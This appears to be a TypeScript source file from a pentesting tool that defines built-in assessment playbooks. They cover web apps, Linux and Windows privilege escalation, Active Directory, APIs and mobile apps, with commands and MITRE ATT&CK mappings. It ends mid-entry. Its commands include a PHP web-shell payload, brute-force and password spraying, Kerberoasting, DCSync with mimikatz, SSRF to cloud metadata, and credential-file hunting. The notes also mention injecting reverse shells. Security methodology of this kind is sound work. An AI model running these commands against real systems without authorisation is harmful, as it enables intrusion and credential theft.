import type { Playbook, PlaybookStep } from './types'
import { BUILTIN_CCNA_A } from './builtinCcnaPlaybooks'
import { BUILTIN_CCNA_B } from './builtinCcnaPlaybooksB'

function step(
  id: string,
  order: number,
  title: string,
  description: string,
  category: PlaybookStep['category'],
  commands: string[],
  notes: string,
  required = true,
  mitreTechniqueId?: string,
  mitreTechniqueName?: string,
  stepType: PlaybookStep['stepType'] = 'action'
): PlaybookStep {
  return {
    id, order, title, description, category, commands, notes, required,
    ...(mitreTechniqueId && { mitreTechniqueId }),
    ...(mitreTechniqueName && { mitreTechniqueName }),
    stepType,
  }
}

const NOW = '2025-01-01T00:00:00.000Z'

const PENTEST_PLAYBOOKS: Playbook[] = [
  // ─── Web Application Assessment ────────────────────────────────────────────
  {
    id: 'builtin-web-app',
    name: 'Web Application Assessment',
    description: 'Comprehensive methodology for assessing web application security.',
    category: 'web-app',
    tags: ['web', 'owasp', 'burp'],
    version: '1.0',
    createdAt: NOW,
    updatedAt: NOW,
    isBuiltIn: true,
    variables: { TARGET_URL: '', TARGET_IP: '' },
    steps: [
      step('wa-1', 1, 'Passive Recon', 'Gather information without directly interacting with the target. Use OSINT tools, Shodan, Google dorks, and certificate transparency logs.', 'recon',
        ['whois target.com', 'subfinder -d target.com', 'amass enum -passive -d target.com', 'theHarvester -d target.com -b all'],
        'Check for exposed S3 buckets, leaked credentials in GitHub, LinkedIn employee data.', true, 'T1596', 'Search Open Technical Databases', 'action'),
      step('wa-2', 2, 'Active Recon (nmap)', 'Port scan the target to identify running services and open ports.', 'recon',
        ['nmap -sV -sC -oN nmap_initial.txt <IP>', 'nmap -p- --min-rate 5000 -oN nmap_allports.txt <IP>'],
        'Note all web services and their versions. Check for unusual ports.', true, 'T1046', 'Network Service Discovery', 'command'),
      step('wa-3', 3, 'Directory Enumeration', 'Brute-force directories and files to discover hidden content.', 'enum',
        ['ffuf -w /usr/share/wordlists/dirb/common.txt -u https://{{TARGET_URL}}/FUZZ', 'gobuster dir -u https://{{TARGET_URL}} -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt', 'feroxbuster -u https://{{TARGET_URL}}'],
        'Also enumerate with extensions: .php .asp .aspx .bak .old .zip', true, 'T1083', 'File and Directory Discovery', 'command'),
      step('wa-4', 4, 'Technology Fingerprinting', 'Identify the tech stack, frameworks, CMS, and libraries in use.', 'recon',
        ['whatweb https://{{TARGET_URL}}', 'curl -I https://{{TARGET_URL}}'],
        'Check headers (X-Powered-By, Server), cookies, HTML comments, and JS bundle names.', true, undefined, undefined, 'verification'),
      step('wa-5', 5, 'Authentication Testing', 'Test login mechanisms for common weaknesses: default creds, lockout bypass, username enumeration.', 'exploit',
        ['hydra -L users.txt -P pass.txt https-post-form "/login:user=^USER^&pass=^PASS^:Invalid"'],
        'Test: default credentials, no lockout, username enumeration via timing/response, password reset flaws.', true, 'T1110', 'Brute Force', 'action'),
      step('wa-6', 6, 'Input Validation Testing (XSS/SQLi/SSTI)', 'Inject payloads into all input fields and parameters to test for injection vulnerabilities.', 'exploit',
        ["sqlmap -u 'https://{{TARGET_URL}}/page?id=1' --batch", 'dalfox url https://{{TARGET_URL}}/search?q=test'],
        "Test every user-controlled input: GET/POST params, headers, cookies. Use Burp Intruder for fuzzing.", true, 'T1059', 'Command and Scripting Interpreter', 'action'),
      step('wa-7', 7, 'Business Logic Testing', 'Test application-specific workflows for logic flaws that automated tools miss.', 'exploit',
        [],
        'Examples: price manipulation, step skipping in multi-step flows, privilege escalation via parameter tampering, IDOR.', false, undefined, undefined, 'documentation'),
      step('wa-8', 8, 'File Upload Testing', 'Test file upload functionality for bypass of type restrictions and code execution.', 'exploit',
        ["exiftool -Comment=\"<?php system($_GET['cmd']); ?>\" image.jpg"],
        'Try: changing Content-Type, double extensions (.php.jpg), null bytes, magic byte manipulation.', true, 'T1505.003', 'Web Shell', 'action'),
      step('wa-9', 9, 'API Endpoint Discovery', 'Identify and test API endpoints for authentication issues, excessive data exposure, and injection.', 'enum',
        ['ffuf -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -u https://{{TARGET_URL}}/api/FUZZ', 'arjun -u https://{{TARGET_URL}}/api/endpoint'],
        'Check Swagger/OpenAPI docs, JS files for hardcoded endpoints, and test BOLA/BFLA.', true, 'T1046', 'Network Service Discovery', 'command'),
      step('wa-10', 10, 'Report Generation', 'Document all findings with evidence, CVSS scores, and remediation recommendations.', 'report',
        [],
        'Include: executive summary, findings table, per-finding detail (description, evidence, impact, remediation), appendix.', true, undefined, undefined, 'documentation'),
    ]
  },

  // ─── Linux Privilege Escalation ────────────────────────────────────────────
  {
    id: 'builtin-linux-privesc',
    name: 'Linux Privilege Escalation',
    description: 'Systematic methodology for escalating privileges on a compromised Linux host.',
    category: 'linux',
    tags: ['linux', 'privesc', 'post-exploitation'],
    version: '1.0',
    createdAt: NOW,
    updatedAt: NOW,
    isBuiltIn: true,
    steps: [
      step('lp-1', 1, 'Initial Enumeration', 'Establish who you are and basic host information.', 'enum',
        ['whoami', 'id', 'hostname', 'uname -a', 'cat /etc/os-release', 'env', 'pwd'],
        'Note your username, groups, and OS version. Groups like docker, lxd, disk are immediate privesc paths.', true, 'T1033', 'System Owner/User Discovery', 'action'),
      step('lp-2', 2, 'SUID/GUID Binaries', 'Find binaries with SUID/GUID bit set that may be exploitable.', 'privesc',
        ['find / -perm -u=s -type f 2>/dev/null', 'find / -perm -g=s -type f 2>/dev/null'],
        'Cross-reference results with GTFOBins (gtfobins.github.io) for exploitation methods.', true, 'T1548.001', 'Setuid and Setgid', 'command'),
      step('lp-3', 3, 'Sudo Permissions', 'Check what commands the current user can run as root via sudo.', 'privesc',
        ['sudo -l', 'sudo -V'],
        'Any binary listed without a password prompt can likely be abused. Check GTFOBins.', true, 'T1548.003', 'Sudo and Sudo Caching', 'command'),
      step('lp-4', 4, 'Cron Jobs', 'Look for cron jobs running as root that we can manipulate.', 'privesc',
        ['cat /etc/crontab', 'ls -la /etc/cron*', 'cat /var/spool/cron/crontabs/root 2>/dev/null', 'pspy64'],
        'If a cron script is world-writable or calls a world-writable binary, inject a reverse shell.', true, 'T1053.003', 'Cron', 'command'),
      step('lp-5', 5, 'Writable Files in PATH', 'Find writable directories in the system PATH to plant malicious binaries.', 'privesc',
        ['echo $PATH', "find /usr/local/bin /usr/bin /bin -writable 2>/dev/null"],
        'If a root cron or SUID binary calls a relative path command, create a malicious version in the writable directory.', true, 'T1574.007', 'Path Interception by PATH Environment Variable', 'action'),
      step('lp-6', 6, 'Kernel Version Check', 'Check kernel version against known privilege escalation exploits.', 'privesc',
        ['uname -r', 'searchsploit linux kernel $(uname -r)'],
        'Notable exploits: DirtyCow (2.6.22-3.9), Overlayfs, DirtyPipe (5.8-5.16). Check exploit-db.', true, 'T1068', 'Exploitation for Privilege Escalation', 'verification'),
      step('lp-7', 7, 'Running Services', 'Enumerate running services, especially those bound to localhost only.', 'enum',
        ['ps aux', 'ss -tlnp', 'netstat -tlnp 2>/dev/null'],
        'Services bound to 127.0.0.1 may be exploitable via port forwarding. Check versions for known CVEs.', true, 'T1057', 'Process Discovery', 'command'),
      step('lp-8', 8, 'Network Connections', 'Map active connections and listening services.', 'enum',
        ['ss -anp', 'ip route', 'arp -a', 'cat /etc/hosts'],
        'Identify internal network ranges for lateral movement opportunities.', true, 'T1049', 'System Network Connections Discovery', 'command'),
      step('lp-9', 9, 'Sensitive Files Check', 'Search for credentials, keys, and sensitive configuration files.', 'loot',
        ['find / -name "*.conf" -readable 2>/dev/null | head -20', 'find / -name "id_rsa" 2>/dev/null', 'find / -name ".env" 2>/dev/null', 'cat ~/.bash_history'],
        'Also check: /var/www/, /opt/, database configs, .git directories, backup files.', true, 'T1552', 'Unsecured Credentials', 'action'),
      step('lp-10', 10, 'Password Reuse Check', 'Test discovered passwords against system accounts and services.', 'loot',
        ['cat /etc/passwd | grep -v nologin', 'su - <username>'],
        'Check /etc/passwd for users with shells, try reusing any found passwords. Check for readable /etc/shadow.', false, 'T1078', 'Valid Accounts', 'verification'),
    ]
  },

  // ─── Active Directory Initial Access ───────────────────────────────────────
  {
    id: 'builtin-ad-initial',
    name: 'Active Directory Initial Access',
    description: 'Methodology for gaining initial foothold and escalating within an Active Directory environment.',
    category: 'active-directory',
    tags: ['active-directory', 'windows', 'kerberos'],
    version: '1.0',
    createdAt: NOW,
    updatedAt: NOW,
    isBuiltIn: true,
    variables: { DC_IP: '', DOMAIN: '', USER: '', PASS: '' },
    steps: [
      step('ad-1', 1, 'Network Enumeration', 'Identify domain controllers, subnet ranges, and key hosts.', 'recon',
        ['nmap -sV --script=smb-security-mode,smb-os-discovery -p 445 <subnet>', 'nmap -p 88 <subnet> --open'],
        'Port 88 (Kerberos) and 389 (LDAP) identifies DCs. Port 445 (SMB) identifies domain-joined hosts.', true, 'T1046', 'Network Service Discovery', 'command'),
      step('ad-2', 2, 'SMB Null Sessions', 'Attempt unauthenticated SMB enumeration to gather domain info.', 'enum',
        ['enum4linux-ng -A {{DC_IP}}', 'smbclient -L //{{DC_IP}}/ -N', 'crackmapexec smb {{DC_IP}} --shares -u "" -p ""'],
        'Null sessions can reveal usernames, groups, shares, and password policy without credentials.', true, 'T1135', 'Network Share Discovery', 'command'),
      step('ad-3', 3, 'Kerberoasting Check', 'Request TGS tickets for SPNs and crack them offline.', 'exploit',
        ['impacket-GetUserSPNs -request -dc-ip {{DC_IP}} {{DOMAIN}}/{{USER}}:{{PASS}}', 'hashcat -m 13100 hashes.txt rockyou.txt'],
        'Any service account with an SPN is vulnerable. Prioritize accounts with admin-like names.', true, 'T1558.003', 'Kerberoasting', 'action'),
      step('ad-4', 4, 'Password Spray (Safe Threshold)', 'Spray one password across many accounts to avoid lockouts.', 'exploit',
        ['crackmapexec smb {{DC_IP}} -u users.txt -p "Password1" --continue-on-success', 'kerbrute passwordspray -d {{DOMAIN}} --dc {{DC_IP}} users.txt "Password1"'],
        'Check password policy first (lockout threshold). Stay at least 2 attempts below threshold. Spray only once per hour.', true, 'T1110.003', 'Password Spraying', 'action'),
      step('ad-5', 5, 'AS-REP Roasting', 'Find accounts with pre-authentication disabled and crack their hashes.', 'exploit',
        ['impacket-GetNPUsers {{DOMAIN}}/ -usersfile users.txt -dc-ip {{DC_IP}} -format hashcat', 'hashcat -m 18200 hashes.txt rockyou.txt'],
        'No credentials needed. Users with DONT_REQUIRE_PREAUTH flag set are vulnerable.', true, 'T1558.004', 'AS-REP Roasting', 'action'),
      step('ad-6', 6, 'LLMNR/NBT-NS Poisoning', 'Poison name resolution broadcasts to capture NTLMv2 hashes.', 'exploit',
        ['responder -I eth0 -rdwv'],
        'Works best on networks with mistyped UNC paths. Hashes can be cracked or relayed. Requires being on the same subnet.', true, 'T1557.001', 'LLMNR/NBT-NS Poisoning and SMB Relay', 'action'),
      step('ad-7', 7, 'BloodHound Collection', 'Map AD attack paths using BloodHound.', 'enum',
        ['bloodhound-python -u {{USER}} -p {{PASS}} -d {{DOMAIN}} -dc {{DC_IP}} -c All', 'SharpHound.exe -c All'],
        'Look for shortest path to Domain Admin. Check for ACL abuse paths, unconstrained delegation.', true, 'T1087.002', 'Domain Account', 'command'),
      step('ad-8', 8, 'DCSync Check', 'If sufficient privileges, replicate domain credentials via DCSync.', 'post',
        ['impacket-secretsdump {{DOMAIN}}/{{USER}}:{{PASS}}@{{DC_IP}}', 'mimikatz "lsadump::dcsync /domain:{{DOMAIN}} /user:krbtgt"'],
        'Requires DS-Replication permissions. Grants krbtgt hash for Golden Ticket creation.', false, 'T1003.006', 'DCSync', 'action'),
      step('ad-9', 9, 'Report', 'Document the attack path from initial access to domain compromise.', 'report',
        [],
        'Include: initial access vector, privilege escalation chain, lateral movement steps, domain compromise evidence, recommended mitigations.', true, undefined, undefined, 'documentation'),
    ]
  },

  // ─── Network Recon ─────────────────────────────────────────────────────────
  {
    id: 'builtin-network-recon',
    name: 'Network Recon',
    description: 'Systematic network reconnaissance and service enumeration methodology.',
    category: 'network',
    tags: ['network', 'nmap', 'recon'],
    version: '1.0',
    createdAt: NOW,
    updatedAt: NOW,
    isBuiltIn: true,
    variables: { SUBNET: '', TARGET: '' },
    steps: [
      step('nr-1', 1, 'Host Discovery (Ping Sweep)', 'Identify live hosts on the network.', 'recon',
        ['nmap -sn {{SUBNET}}', 'fping -a -g {{SUBNET}} 2>/dev/null', 'arp-scan --localnet'],
        'Use multiple methods — some hosts block ICMP but respond to ARP. Save live host list to file.', true, 'T1018', 'Remote System Discovery', 'command'),
      step('nr-2', 2, 'Port Scan (Top 1000)', 'Fast scan of the most common ports across all live hosts.', 'enum',
        ['nmap -sV -sC --top-ports 1000 -oA nmap_top1000 {{TARGET}}', 'nmap -T4 -F -oN nmap_fast.txt {{TARGET}}'],
        'Get a quick picture of the attack surface before spending time on full scans.', true, 'T1046', 'Network Service Discovery', 'command'),
      step('nr-3', 3, 'Full Port Scan (All Ports)', 'Scan all 65535 ports to find services on non-standard ports.', 'enum',
        ['nmap -p- --min-rate 5000 -oA nmap_allports {{TARGET}}', 'masscan -p 1-65535 {{TARGET}} --rate=10000'],
        'Services often run on non-standard ports. This scan takes longer — run in background.', true, 'T1046', 'Network Service Discovery', 'command'),
      step('nr-4', 4, 'Service Version Detection', 'Identify exact service versions for CVE research.', 'enum',
        ['nmap -sV -sC -p <open-ports> -oA nmap_versions {{TARGET}}', 'nmap --script=banner -p <ports> {{TARGET}}'],
        'Cross-reference versions with searchsploit and NVD. Note any outdated or EOL software.', true, undefined, undefined, 'verification'),
      step('nr-5', 5, 'OS Fingerprinting', 'Determine operating systems running on discovered hosts.', 'recon',
        ['nmap -O --osscan-guess {{TARGET}}', 'nmap -A -p <ports> {{TARGET}}'],
        'OS info helps narrow down applicable exploits and misconfigurations.', true, 'T1082', 'System Information Discovery', 'command'),
      step('nr-6', 6, 'Vulnerability Scan', 'Run automated vulnerability detection against discovered services.', 'exploit',
        ['nmap --script=vuln -p <ports> {{TARGET}}', 'nmap --script=smb-vuln* -p 445 {{TARGET}}'],
        'Check for: EternalBlue (MS17-010), BlueKeep (MS19-0708), PrintNightmare. Verify findings manually.', true, 'T1190', 'Exploit Public-Facing Application', 'action'),
      step('nr-7', 7, 'Screenshot Web Services', 'Capture screenshots of all web interfaces for visual triage.', 'recon',
        ['gowitness scan --cidr {{SUBNET}}', 'aquatone -out screenshots/ < hosts.txt', 'eyewitness --web -f hosts.txt'],
        'Screenshots allow rapid triage of many services. Look for default pages, login portals, dev environments.', false, undefined, undefined, 'documentation'),
      step('nr-8', 8, 'Report', 'Compile network map with services, versions, and vulnerability findings.', 'report',
        [],
        'Include: network topology diagram, host inventory table, critical findings, remediation priorities.', true, undefined, undefined, 'documentation'),
    ]
  },

  // ─── OWASP Top 10 ──────────────────────────────────────────────────────────
  {
    id: 'builtin-owasp-top10',
    name: 'OWASP Top 10 Assessment',
    description: 'Structured assessment covering all 10 OWASP Top 10 vulnerability classes.',
    category: 'web-app',
    tags: ['owasp', 'web', 'checklist'],
    version: '1.0',
    createdAt: NOW,
    updatedAt: NOW,
    isBuiltIn: true,
    variables: { TARGET_URL: '' },
    steps: [
      step('ow-1', 1, 'A01: Broken Access Control', 'Test for IDOR, privilege escalation, missing function-level access controls, and CORS misconfiguration.', 'exploit',
        ['ffuf -w ids.txt -u https://{{TARGET_URL}}/api/users/FUZZ -H "Authorization: Bearer low-priv-token"'],
        'Try accessing admin endpoints with low-priv token. Increment IDs (IDOR). Test CORS with malicious origin.', true, 'T1548', 'Abuse Elevation Control Mechanism', 'action'),
      step('ow-2', 2, 'A02: Cryptographic Failures', 'Identify sensitive data exposed in transit or at rest due to weak/missing encryption.', 'recon',
        ['curl -I https://{{TARGET_URL}} | grep -i "strict-transport"', 'sslscan {{TARGET_URL}}', 'testssl.sh {{TARGET_URL}}'],
        'Check: TLS version, cipher suites, certificate validity, HSTS. Look for PII in API responses without auth.', true, undefined, undefined, 'verification'),
      step('ow-3', 3, 'A03: Injection (SQLi/XSS/SSTI/XXE)', 'Test all input vectors for injection vulnerabilities.', 'exploit',
        ["sqlmap -u 'https://{{TARGET_URL}}/search?q=test' --batch --dbs", 'dalfox url https://{{TARGET_URL}}/search?q=test'],
        'Cover: SQLi, XSS, SSTI, XXE, LDAP injection, OS command injection. Use Burp Scanner + manual verification.', true, 'T1059', 'Command and Scripting Interpreter', 'action'),
      step('ow-4', 4, 'A04: Insecure Design', 'Review application design for missing security controls and flawed business logic.', 'exploit',
        [],
        'Look for: missing rate limiting, lack of anti-automation, flawed multi-step workflows, trust boundary violations.', false, undefined, undefined, 'documentation'),
      step('ow-5', 5, 'A05: Security Misconfiguration', 'Check for default configs, unnecessary features, verbose errors, and missing hardening.', 'enum',
        ['curl -s https://{{TARGET_URL}}/robots.txt', 'curl -s https://{{TARGET_URL}}/.git/config', 'curl -s https://{{TARGET_URL}}/phpinfo.php'],
        'Check: debug mode, default credentials, exposed admin panels, directory listing, error messages revealing stack traces.', true, undefined, undefined, 'command'),
      step('ow-6', 6, 'A06: Vulnerable Components', 'Identify outdated or vulnerable libraries, frameworks, and dependencies.', 'recon',
        ['retire --js --path ./static', 'npm audit', 'snyk test'],
        'Check JS library versions (Retire.js), server framework versions, and cross-reference with NVD/CVE databases.', true, 'T1195.002', 'Compromise Software Supply Chain', 'verification'),
      step('ow-7', 7, 'A07: Auth & Session Failures', 'Test authentication mechanisms, session management, and credential security.', 'exploit',
        ['hydra -L users.txt -P pass.txt http-post-form "{{TARGET_URL}}/login:user=^USER^&pass=^PASS^:error"'],
        'Check: weak passwords, no MFA, session fixation, session timeout, secure/httpOnly cookie flags, JWT weaknesses.', true, 'T1110', 'Brute Force', 'action'),
      step('ow-8', 8, 'A08: Software and Data Integrity Failures', 'Test for insecure deserialization and CI/CD pipeline integrity.', 'exploit',
        ['ysoserial -g CommonsCollections1 -a "whoami" > payload.ser'],
        'Test Java/PHP/Python deserialization. Check update mechanisms. Review third-party plugins. Test JWT alg:none.', false, 'T1195', 'Supply Chain Compromise', 'action'),
      step('ow-9', 9, 'A09: Logging & Monitoring Failures', 'Verify that security events are logged and alerts fire on suspicious activity.', 'verification',
        [],
        'Perform suspicious actions (failed logins, IDOR attempts) and check if they appear in logs. Review log format for completeness.', false, undefined, undefined, 'verification'),
      step('ow-10', 10, 'A10: SSRF', 'Test for Server-Side Request Forgery in all URL input parameters.', 'exploit',
        ['curl -s "https://{{TARGET_URL}}/fetch?url=http://169.254.169.254/latest/meta-data/"', 'curl -s "https://{{TARGET_URL}}/webhook?callback=http://your-burp-collab"'],
        'Try: AWS metadata endpoint, internal IPs, file:// scheme, DNS rebinding. Use Burp Collaborator for blind SSRF.', true, 'T1090', 'Proxy', 'action'),
    ]
  },

  // ─── Web App Pentest Phases ─────────────────────────────────────────────────
  {
    id: 'builtin-webapp-phases',
    name: 'Web App Pentest Phases',
    description: 'Full-lifecycle web application penetration test: Recon → Enum → Exploit → Post-Exploit → Report.',
    category: 'web-app',
    tags: ['web', 'pentest', 'phases'],
    version: '1.0',
    createdAt: NOW,
    updatedAt: NOW,
    isBuiltIn: true,
    variables: { TARGET_URL: '', TARGET_IP: '' },
    steps: [
      step('wp-1', 1, 'Reconnaissance', 'Passive information gathering about the target.', 'recon',
        ['amass enum -passive -d {{TARGET_URL}}', 'shodan host {{TARGET_IP}}', 'theharvester -d {{TARGET_URL}} -b all'],
        'Gather: subdomains, emails, technologies, ASN, IP ranges, GitHub repos, LinkedIn employees.', true, 'T1596', 'Search Open Technical Databases', 'action'),
      step('wp-2', 2, 'Enumeration', 'Active discovery of application structure, endpoints, and parameters.', 'enum',
        ['ffuf -w raft-large-directories.txt -u https://{{TARGET_URL}}/FUZZ', 'arjun -u https://{{TARGET_URL}}/api/v1/endpoint', 'linkfinder -i https://{{TARGET_URL}} -o cli'],
        'Map: all endpoints, parameters, authentication flows, API contracts, WebSocket connections.', true, 'T1083', 'File and Directory Discovery', 'command'),
      step('wp-3', 3, 'Exploitation', 'Attempt to exploit identified vulnerabilities.', 'exploit',
        ["sqlmap -u 'https://{{TARGET_URL}}/?id=1' --batch --level=3", 'nuclei -u https://{{TARGET_URL}} -t cves/ -t vulnerabilities/'],
        'Prioritize: injection flaws, authentication bypasses, IDOR, business logic flaws. Document all PoC with screenshots.', true, 'T1190', 'Exploit Public-Facing Application', 'action'),
      step('wp-4', 4, 'Post-Exploitation', 'Assess impact of successful exploitation — data access, pivoting, persistence.', 'post',
        [],
        'If RCE achieved: check accessible data, internal network, cloud metadata. Demonstrate business impact clearly.', false, 'T1005', 'Data from Local System', 'documentation'),
      step('wp-5', 5, 'Report', 'Write comprehensive pentest report with all findings and recommendations.', 'report',
        [],
        'Structure: executive summary, methodology, scope, findings (CVSS-rated), evidence, remediation roadmap, appendix.', true, undefined, undefined, 'documentation'),
    ]
  },

  // ─── API Security Assessment ────────────────────────────────────────────────
  {
    id: 'builtin-api-security',
    name: 'API Security Assessment',
    description: 'OWASP API Security Top 10 focused assessment methodology.',
    category: 'web-app',
    tags: ['api', 'rest', 'graphql', 'owasp'],
    version: '1.0',
    createdAt: NOW,
    updatedAt: NOW,
    isBuiltIn: true,
    variables: { API_BASE: '', TOKEN: '' },
    steps: [
      step('api-1', 1, 'API Discovery', 'Enumerate all API endpoints, versions, and documentation.', 'recon',
        ['ffuf -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -u {{API_BASE}}/FUZZ', 'curl -s {{API_BASE}}/swagger.json', 'curl -s {{API_BASE}}/openapi.json'],
        'Look for: Swagger/OpenAPI docs, /api-docs, /v1/v2/v3 versioning, GraphQL introspection.', true, 'T1046', 'Network Service Discovery', 'command'),
      step('api-2', 2, 'Authentication Testing (API1)', 'Test JWT, API keys, OAuth tokens for weaknesses.', 'exploit',
        ['curl -s {{API_BASE}}/users -H "Authorization: Bearer INVALID"', 'python3 jwt_tool.py <token> -T'],
        'Test: no auth required, weak JWT (alg:none, weak secret), API key in URL, OAuth flows, token expiry.', true, 'T1528', 'Steal Application Access Token', 'action'),
      step('api-3', 3, 'BOLA Testing (API2)', 'Test for Broken Object Level Authorization (IDOR).', 'exploit',
        ['curl -s {{API_BASE}}/users/1 -H "Authorization: Bearer {{TOKEN}}"', 'curl -s {{API_BASE}}/users/2 -H "Authorization: Bearer {{TOKEN}}"'],
        'Increment IDs, try UUIDs of other users. Test with: low-priv token accessing high-priv object.', true, 'T1548', 'Abuse Elevation Control Mechanism', 'action'),
      step('api-4', 4, 'Excessive Data Exposure (API3)', 'Check if APIs return more data than necessary.', 'recon',
        ['curl -s {{API_BASE}}/users/me -H "Authorization: Bearer {{TOKEN}}" | jq .'],
        'Look for: PII in responses, fields the client filters out, hidden fields. Compare mobile app response vs web app.', true, undefined, undefined, 'verification'),
      step('api-5', 5, 'Rate Limiting (API4)', 'Test for missing rate limiting on sensitive endpoints.', 'exploit',
        ['ab -n 1000 -c 50 -H "Authorization: Bearer {{TOKEN}}" {{API_BASE}}/login', 'ffuf -u {{API_BASE}}/api/otp -w /dev/stdin -t 50 -p 0.1'],
        'Test: brute force endpoints, OTP/2FA bypass via rate limit absence, resource exhaustion.', true, undefined, undefined, 'action'),
      step('api-6', 6, 'Function Level Authorization (API5)', 'Test access to admin/privileged functions with low-priv tokens.', 'exploit',
        ['curl -s -X DELETE {{API_BASE}}/users/1 -H "Authorization: Bearer {{TOKEN}}"', 'curl -s -X PUT {{API_BASE}}/admin/config -H "Authorization: Bearer {{TOKEN}}"'],
        'Try admin endpoints with regular user token. Test HTTP method manipulation (GET → POST → PUT → DELETE).', true, 'T1548', 'Abuse Elevation Control Mechanism', 'action'),
      step('api-7', 7, 'Mass Assignment (API6)', 'Test for unprotected parameter binding allowing privilege escalation.', 'exploit',
        ['curl -s -X PUT {{API_BASE}}/users/me -H "Authorization: Bearer {{TOKEN}}" -d \'{"role":"admin","isAdmin":true}\''],
        'Add extra fields to requests: role, isAdmin, permissions, balance. See if server accepts and persists them.', true, undefined, undefined, 'action'),
      step('api-8', 8, 'Injection Testing (API8)', 'Test API parameters for injection vulnerabilities.', 'exploit',
        ["sqlmap -u '{{API_BASE}}/users?search=test' -H 'Authorization: Bearer {{TOKEN}}' --batch"],
        'Test: SQL injection in query params, NoSQL injection (MongoDB operators), SSTI in template fields.', true, 'T1059', 'Command and Scripting Interpreter', 'action'),
      step('api-9', 9, 'Report', 'Document all API vulnerabilities with CVSS scores and remediation.', 'report',
        [],
        'Include API inventory, auth flow diagram, all findings with PoC curl commands, remediation guidance.', true, undefined, undefined, 'documentation'),
    ]
  },

  // ─── Mobile App Security ────────────────────────────────────────────────────
  {
    id: 'builtin-mobile-security',
    name: 'Mobile App Security Assessment',
    description: 'OWASP MASVS-based mobile application security assessment for iOS and Android.',
    category: 'web-app',
    tags: ['mobile', 'android', 'ios', 'masvs'],
    version: '1.0',
    createdAt: NOW,
    updatedAt: NOW,
    isBuiltIn: true,
    variables: { APP_PACKAGE: '', DEVICE_IP: '' },
    steps: [
      step('mob-1', 1, 'Static Analysis Setup', 'Decompile/extract the application binary for static analysis.', 'recon',
        ['apktool d app.apk -o app_decoded', 'jadx -d app_source app.apk', 'unzip -o app.ipa -d app_ios'],
        'For Android: use apktool + jadx. For iOS: use ipa-analyzer, class-dump, Hopper/IDA.', true, undefined, undefined, 'action'),
      step('mob-2', 2, 'Hardcoded Secrets', 'Search decompiled source for API keys, credentials, and sensitive data.', 'recon',
        ['grep -rn "api_key\\|secret\\|password\\|token" app_source/ --include="*.java"', 'trufflehog filesystem ./app_source'],
        'Look in: strings.xml, BuildConfig.java, hardcoded URLs, certificate pinning bypass logic.', true, 'T1552', 'Unsecured Credentials', 'command'),
      step('mob-3', 3, 'Network Traffic Analysis', 'Intercept and analyze app network traffic via proxy.', 'exploit',
        ['adb shell settings put global http_proxy {{DEVICE_IP}}:8080', 'frida -U -f {{APP_PACKAGE}} --no-pause -l ssl_bypass.js'],
        'Set up Burp proxy on device. Bypass SSL pinning with Frida scripts. Test all API endpoints.', true, 'T1557', 'Adversary-in-the-Middle', 'action'),
      step('mob-4', 4, 'Local Data Storage', 'Check for sensitive data stored insecurely on device.', 'recon',
        ['adb shell run-as {{APP_PACKAGE}} find /data/data/{{APP_PACKAGE}} -type f', 'adb pull /data/data/{{APP_PACKAGE}}/databases/ ./databases/'],
        'Check: SharedPreferences, SQLite databases, internal files, external storage, keychain/keystore.', true, 'T1005', 'Data from Local System', 'command'),
      step('mob-5', 5, 'Dynamic Analysis', 'Runtime analysis with Frida for hooking and manipulation.', 'exploit',
        ['frida -U -f {{APP_PACKAGE}} --no-pause -l universal_android_ssl_pinning_bypass.js', 'objection -g {{APP_PACKAGE}} explore'],
        'Hook authentication methods, bypass root detection, dump runtime secrets, intercept crypto operations.', false, 'T1629', 'Impair Defenses', 'action'),
      step('mob-6', 6, 'Report', 'Document mobile security findings with CVSS scores and OWASP MASVS references.', 'report',
        [],
        'Reference MASVS categories (MSTG-STORAGE, MSTG-NETWORK, MSTG-CRYPTO, MSTG-AUTH, MSTG-CODE).', true, undefined, undefined, 'documentation'),
    ]
  },

  // ─── Privilege Escalation Checklist ────────────────────────────────────────
  {
    id: 'builtin-privesc-checklist',
    name: 'Privilege Escalation Checklist',
    description: 'Comprehensive checklist covering Windows and Linux privilege escalation vectors.',
    category: 'windows',
    tags: ['privesc', 'windows', 'linux', 'checklist'],
    version: '1.0',
    createdAt: NOW,
    updatedAt: NOW,
    isBuiltIn: true,
    steps: [
      step('pc-1', 1, 'Windows: System Information', 'Gather system info to identify OS version and potential kernel exploits.', 'enum',
        ['systeminfo', 'whoami /all', 'net user', 'net localgroup administrators'],
        'Check: OS version for unpatched vulns, user privileges, group memberships.', true, 'T1082', 'System Information Discovery', 'command'),
      step('pc-2', 2, 'Windows: Unquoted Service Paths', 'Find services with unquoted paths that contain spaces.', 'privesc',
        ['wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\\windows\\\\" | findstr /i /v \'"""\''],
        'If a service path is unquoted and contains spaces, plant malicious binary in exploitable directory.', true, 'T1574.009', 'Unquoted Service Path', 'command'),
      step('pc-3', 3, 'Windows: Weak Service Permissions', 'Find services with misconfigured permissions allowing modification.', 'privesc',
        ['accesschk.exe -wuvc "Everyone" *', 'accesschk.exe -wuvc "Users" *', 'sc qc <service_name>'],
        'If service binary is writable or service config is modifiable, replace with malicious binary.', true, 'T1574.010', 'Services File Permissions Weakness', 'action'),
      step('pc-4', 4, 'Windows: AlwaysInstallElevated', 'Check if MSI packages always install with elevated privileges.', 'privesc',
        ['reg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated', 'reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated'],
        'If both keys are set to 1, create a malicious MSI and install it to get SYSTEM.', true, 'T1218.007', 'Msiexec', 'command'),
      step('pc-5', 5, 'Windows: Token Impersonation', 'Check for SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege.', 'privesc',
        ['whoami /priv'],
        'If SeImpersonatePrivilege is enabled: use PrintSpoofer, RoguePotato, or JuicyPotato.', true, 'T1134.001', 'Token Impersonation/Theft', 'verification'),
      step('pc-6', 6, 'Linux: World-Writable Files', 'Find world-writable files and directories that may allow modification.', 'privesc',
        ['find / -xdev -type f -perm -0002 2>/dev/null', 'find / -xdev -type d -perm -0002 2>/dev/null'],
        'Check if any writable files are executed by higher-privileged processes (scripts, libraries).', true, 'T1548.001', 'Setuid and Setgid', 'command'),
      step('pc-7', 7, 'Linux: Capabilities', 'Check for processes/binaries with elevated Linux capabilities.', 'privesc',
        ['getcap -r / 2>/dev/null'],
